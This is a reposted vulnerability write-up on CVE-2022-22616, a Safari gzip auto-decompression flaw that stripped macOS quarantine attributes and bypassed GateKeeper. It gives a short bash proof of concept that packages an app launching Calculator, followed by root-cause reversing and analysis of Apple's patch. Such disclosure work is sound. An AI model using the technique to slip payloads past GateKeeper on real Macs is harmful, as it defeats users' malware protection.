CVE-2022-22616: Simple way to bypass GateKeeper, hidden for years

渗透技巧 2年前 (2022) admin
745 0 0

In this writeup, I will introduce a very simple method to bypass GateKeeper , and uncover the root cause through reversing and debugging. Apple had already addressed it as CVE-2022-22616 in macOS Monterey 12.3, and credited the bug to two Jamf researchers (@malwarezoo, @jbradley89) and me. So, make sure you have updated your Mac devices to the latest version.

POC

#!/bin/bash
mkdir -p poc.app/Contents/MacOS
echo "#!/bin/bash" > poc.app/Contents/MacOS/poc
echo "open -a Calculator" >> poc.app/Contents/MacOS/poc
chmod +x poc.app/Contents/MacOS/poc
zip -r poc.app.zip poc.app
gzip -c poc.app.zip > poc.app.zip.gz

After the file poc.app.zip.gz is downloaded by using , macOS will decompress it automatically.Safari.app

However, it will lose the com.apple.quarantine extended attribute when decompressing the gzip file.

Then open the , it will pop a Calculator directly without any prompt.poc.app

Click to watch the demo video

Root Cause

I found the bug by accident when I downloaded something normally by using Safari. I was surprised by the loss of the extended attribute. Then I wondered who is responsible for the automatic decompression, and why it loses the extended attribute.

Through file monitoring, I found the process is actually the one I was looking for. Here is the call stack for the extraction:/Applications/Safari.app/Contents/XPCServices/com.apple.Safari.SandboxBroker.xpc/Contents/MacOS/com.apple.Safari.SandboxBroker

CVE-2022-22616: Simple way to bypass GateKeeper, hidden for years

Then I found the vulnerable function from the private framework :__42__WBSDownloadFileGZipUnarchiver_unarchive__block_invokeSafariShared

CVE-2022-22616: Simple way to bypass GateKeeper, hidden for years

At line , it writes the decompressed data to directly, and forgets to set the extended attribute .66dstPathcom.apple.quarantine

Patch

Apple addressed the issue in macOS 12.3, Let’s check the patch:

CVE-2022-22616: Simple way to bypass GateKeeper, hidden for years

As expected, now it copies the quarantine properties too at line .89

Another Vulnerable Function ?

There are two kinds of archive file will be automatically decompressed by the process SandboxBroker:

CVE-2022-22616: Simple way to bypass GateKeeper, hidden for years

The class is the base class of and , it extracts the target file by the virtual method .WBSDownloadFileUnarchiverWBSDownloadFileGZipUnarchiverWBSDownloadFileBOMUnarchiverunarchive

WBSDownloadFileGZipUnarchiver is responsible for gzip file and WBSDownloadFileBOMUnarchiver is responsible for BOM file. So does WBSDownloadFileBOMUnarchiver have the same issue ?

Apple assigned the same CVE ID for the two functions:

CVE-2022-22616: Simple way to bypass GateKeeper, hidden for years CVE-2022-22616: Simple way to bypass GateKeeper, hidden for years

So it seems that it was vulnerable too.

But I also debugged the function on the old macOS 12.1:

CVE-2022-22616: Simple way to bypass GateKeeper, hidden for years

We can see the parameter for API BOMCopierCopyWithOptions, the attribute copyQuarantine is set to true. It means it will set the quarantine properties if the original zip file has the quarantine properties.options

Apple did make a patch for , then I made a diff, and found nothing new:WBSDownloadFileBOMUnarchiver

CVE-2022-22616: Simple way to bypass GateKeeper, hidden for years

It just replaced the API call with the function pointer call, which is resolved by dynamically. I couldn’t make sense the purpose now. Maybe Jamf researchers will share a different POC later.BOM*dlsym

Summary

The way to bypass GateKeeper is simple enough, and the issue has existed for a long time, I think. I am not sure whether it was actively exploited. If you find the real attacking sample in the wild, please let me know. (You can contact me via Twitter Message @patch1t)

版权声明:admin 发表于 2022年3月16日 下午6:29。
转载请注明:CVE-2022-22616: Simple way to bypass GateKeeper, hidden for years | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...